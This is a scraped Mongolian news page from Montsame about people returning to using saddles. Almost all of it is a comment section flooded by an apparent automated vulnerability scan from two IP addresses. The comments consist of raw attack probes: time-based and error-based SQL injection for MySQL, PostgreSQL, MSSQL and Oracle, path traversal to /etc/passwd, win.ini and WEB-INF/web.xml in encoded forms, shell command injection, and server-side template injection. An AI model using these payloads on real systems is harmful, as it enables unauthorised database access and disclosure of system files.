ӨВӨРХАНГАЙ: Л.Батсүх: Хүмүүс одоо буцаад эмээл хэрэглэх нь ихсэж байна

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-11-25 16:20:06
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',0)='b 185.234.72.114 102 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:6 185.234.72.114 102 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 102 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(6))::text>'0 185.234.72.114 102 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 102 өдөр

  123456
 • admin"and(select*from(select+sleep(6))a/**/union/**/select+1)=" 185.234.72.114 102 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 102 өдөр

  123456
 • admin'and(select*from(select+sleep(6))a/**/union/**/select+1)=' 185.234.72.114 102 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 102 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 102 өдөр

  123456
 • admin"and"h"="k 185.234.72.114 102 өдөр

  123456
 • ../../../../WEB-INF/web.xml 185.234.72.114 102 өдөр

  123456
 • admin"and"e"="e 185.234.72.114 102 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 102 өдөр

  123456
 • admin'and'm'='l 185.234.72.114 102 өдөр

  123456
 • ../../../WEB-INF/web.xml 185.234.72.114 102 өдөр

  123456
 • admin'and'd'='d 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',6)='e
 • ../../WEB-INF/web.xml;admin 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',0)='f
 • ../../WEB-INF/web.xml 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('g',6)
 • ../WEB-INF/web.xml;admin 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('l',0)
 • ../WEB-INF/web.xml 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:6
 • admin 185.234.72.114 102 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • WEB-INF/web.xml;admin 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:6'/**/
 • WEB-INF/web.xml 185.234.72.114 102 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(6))::text>'0
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 102 өдөр

  123456'"\(
 • ./../../../../../../Windows/win.ini 185.234.72.114 102 өдөр

  123456
 • ../../../../../../Windows/win.ini 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(6))>0/**/
 • admin 185.234.72.114 102 өдөр

  123456鎈'"\(
 • admin 185.234.72.114 102 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 185.234.72.114 102 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1717758977')))>'0
 • admin 185.234.72.114 102 өдөр

  123456"and(select*from(select+sleep(6))a/**/union/**/select+1)="
 • admin 185.234.72.114 102 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1595101391')))
 • admin 185.234.72.114 102 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 185.234.72.114 102 өдөр

  123456/**/and/**/cast(md5('1883668697')as/**/int)>0
 • admin 185.234.72.114 102 өдөр

  123456'and(select*from(select+sleep(6))a/**/union/**/select+1)='
 • admin 185.234.72.114 102 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 185.234.72.114 102 өдөр

  123456'and(select'1'from/**/cast(md5(1136581424)as/**/int))>'0
 • admin 185.234.72.114 102 өдөр

  (select*from(select+sleep(6)union/**/select+1)a)
 • admin 185.234.72.114 102 өдөр

  extractvalue(1,concat(char(126),md5(1049215034)))
 • admin 185.234.72.114 102 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 102 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1885512940)))and"
 • admin 185.234.72.114 102 өдөр

  123456"and"h"="h
 • admin 185.234.72.114 102 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1842152739)))and'
 • admin 185.234.72.114 102 өдөр

  123456"and"e"="e
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456'and'z'='w
 • admin 185.234.72.114 102 өдөр

  123456'and'u'='u
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 102 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 102 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456/**/and+1=7
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 102 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 102 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 102 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456/**/and+4=4
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 102 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 102 өдөр

  123456
 • admin鎈'"\( 185.234.72.114 102 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 102 өдөр

  123456
 • admin'"\( 185.234.72.114 102 өдөр

  123456
 • %u2215etc%u2215passwd 185.234.72.114 102 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 102 өдөр

  123456
 • /etc/passwdadmin 185.234.72.114 102 өдөр

  123456
 • /etc/passwd 185.234.72.114 102 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 102 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 102 өдөр

  123456
 • ./../../../../../../etc/passwd 185.234.72.114 102 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 102 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1015300621')))>'0 185.234.72.114 102 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1797410512'))) 185.234.72.114 102 өдөр

  123456
 • expr 955724090 + 872330002 185.234.72.114 102 өдөр

  123456
 • admin&set /A 874770672+886732775 185.234.72.114 102 өдөр

  123456
 • admin/**/and/**/cast(md5('1853506663')as/**/int)>0 185.234.72.114 102 өдөр

  123456
 • admin$(expr 956575025 + 826971893) 185.234.72.114 102 өдөр

  123456
 • ../../../../../../etc/passwd 185.234.72.114 102 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1791331974)as/**/int))>'0 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456
 • admin|expr 891351272 + 899586122 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456
 • admin expr 909178819 + 868044321 185.234.72.114 102 өдөр

  123456
 • <%- 866395620+939382928 %> 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  expr 849491152 + 811558613
 • admin 185.234.72.114 102 өдөр

  123456
 • #set($c=901503966+827947820)${c}$c 185.234.72.114 102 өдөр

  123456
 • '-var_dump(md5(611377081))-' 185.234.72.114 102 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1648322058))) 185.234.72.114 102 өдөр

  123456
 • ${(858084468+961335396)?c} 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456&set /A 966278829+865883043
 • admin"and/**/extractvalue(1,concat(char(126),md5(1300829818)))and" 185.234.72.114 102 өдөр

  123456
 • ${869226835+862384634} 185.234.72.114 102 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1237359980)))and' 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456$(expr 961498912 + 948112283)
 • /*1*/{{958502714+826019105}} 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456|expr 920680777 + 871403956
 • ${@var_dump(md5(446931927))}; 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  <%- 826486018+802509051 %>
 • admin 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  #set($c=892523079+848040566)${c}$c
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  '-var_dump(md5(689337371))-'
 • admin 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  ${(996495998+888854966)?c}
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 102 өдөр

  123456
 • kzhlrrwxvbvswvdfqrkv 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  ${931618158+812241463}
 • admin 185.234.72.114 102 өдөр

  ${996213804+842584312}
 • admin 185.234.72.114 102 өдөр

  123456 expr 972866590 + 807297058
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  kzhlrrwxvbvswvdfqrkv
 • admin 185.234.72.114 102 өдөр

  ${@var_dump(md5(608605161))};
 • admin 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  123456
 • ${846010565+979570620} 185.234.72.114 102 өдөр

  123456
 • admin 185.234.72.114 102 өдөр

  /*1*/{{930751951+812219356}}
 • admin 185.234.72.114 102 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',10)='u 194.163.191.42 103 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',0)='a 194.163.191.42 103 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:10 194.163.191.42 103 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 103 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(10))::text>'0 194.163.191.42 103 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 103 өдөр

  123456
 • admin"and(select*from(select+sleep(10))a/**/union/**/select+1)=" 194.163.191.42 103 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 103 өдөр

  123456
 • admin'and(select*from(select+sleep(10))a/**/union/**/select+1)=' 194.163.191.42 103 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 103 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 103 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 103 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 103 өдөр

  123456
 • admin"and"r"="v 194.163.191.42 103 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 103 өдөр

  123456
 • admin"and"g"="g 194.163.191.42 103 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 103 өдөр

  123456
 • admin'and'h'='q 194.163.191.42 103 өдөр

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 103 өдөр

  123456
 • admin'and'r'='r 194.163.191.42 103 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('i',10)='i
 • ../WEB-INF/web.xml 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l
 • WEB-INF/web.xml;admin 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('v',10)
 • WEB-INF/web.xml 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('d',0)
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:10
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:10'/**/
 • ./../../../../../../Windows/win.ini 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 103 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(10))::text>'0
 • ../../../../../../Windows/win.ini 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 103 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(10))>0/**/
 • admin 194.163.191.42 103 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 103 өдөр

  123456"and(select*from(select+sleep(10))a/**/union/**/select+1)="
 • admin 194.163.191.42 103 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 194.163.191.42 103 өдөр

  123456'and(select*from(select+sleep(10))a/**/union/**/select+1)='
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 103 өдөр

  123456
 • admin'"\( 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  (select*from(select+sleep(10)union/**/select+1)a)
 • admin鎈'"\( 194.163.191.42 103 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1956817707')))>'0 194.163.191.42 103 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456"and"r"="z
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1040659640'))) 194.163.191.42 103 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456"and"k"="k
 • admin/**/and/**/cast(md5('1632956052')as/**/int)>0 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456'and'v'='m
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 103 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1902092215)as/**/int))>'0 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456'and'l'='l
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456/**/and+4=8
 • extractvalue(1,concat(char(126),md5(1209729541))) 194.163.191.42 103 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456/**/and+2=2
 • admin"and/**/extractvalue(1,concat(char(126),md5(1747480077)))and" 194.163.191.42 103 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1504159479)))and' 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456'"\(
 • admin 194.163.191.42 103 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 103 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1358710546')))>'0
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1954495305')))
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456/**/and/**/cast(md5('1373332127')as/**/int)>0
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 103 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 103 өдөр

  123456
 • <%- 894671302+851100400 %> 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456'and(select'1'from/**/cast(md5(1822418156)as/**/int))>'0
 • expr 925325125 + 839113660 194.163.191.42 103 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 103 өдөр

  123456
 • #set($c=825360616+975515775)${c}$c 194.163.191.42 103 өдөр

  123456
 • ${(927586167+968264960)?c} 194.163.191.42 103 өдөр

  123456
 • admin&set /A 835661744+945769006 194.163.191.42 103 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  extractvalue(1,concat(char(126),md5(1205516320)))
 • ${897285670+869436267} 194.163.191.42 103 өдөр

  123456
 • admin$(expr 820825750 + 906152441) 194.163.191.42 103 өдөр

  123456
 • /etc/passwd 194.163.191.42 103 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1432057114)))and"
 • /*1*/{{907262464+875827810}} 194.163.191.42 103 өдөр

  123456
 • admin|expr 961172435 + 926329174 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1317626612)))and'
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  <%- 972648786+961993867 %>
 • admin expr 812344177 + 880635660 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  expr 819703746 + 919152281
 • admin 194.163.191.42 103 өдөр

  #set($c=888449266+873144133)${c}$c
 • admin 194.163.191.42 103 өдөр

  ${(986533064+954415351)?c}
 • ./../../../../../../etc/passwd 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  ${906700695+854733999}
 • admin 194.163.191.42 103 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  /*1*/{{985265732+877609878}}
 • admin 194.163.191.42 103 өдөр

  123456&set /A 876401362+916197453
 • admin 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456$(expr 998178561 + 813473587)
 • admin 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456|expr 982063764 + 824425761
 • admin 194.163.191.42 103 өдөр

  vhkphzycfsxvdzuartxt
 • ../../../../../../etc/passwd 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456 expr 839912824 + 895830582
 • ${824344213+992216212} 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  ${980148123+921333756}
 • admin 194.163.191.42 103 өдөр

  123456
 • '-var_dump(md5(734366220))-' 194.163.191.42 103 өдөр

  123456
 • ${@var_dump(md5(934504333))}; 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  '-var_dump(md5(667157974))-'
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  ${@var_dump(md5(232544949))};
 • admin 194.163.191.42 103 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 103 өдөр

  123456
 • vhkphzycfsxvdzuartxt 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456
 • admin 194.163.191.42 103 өдөр

  123456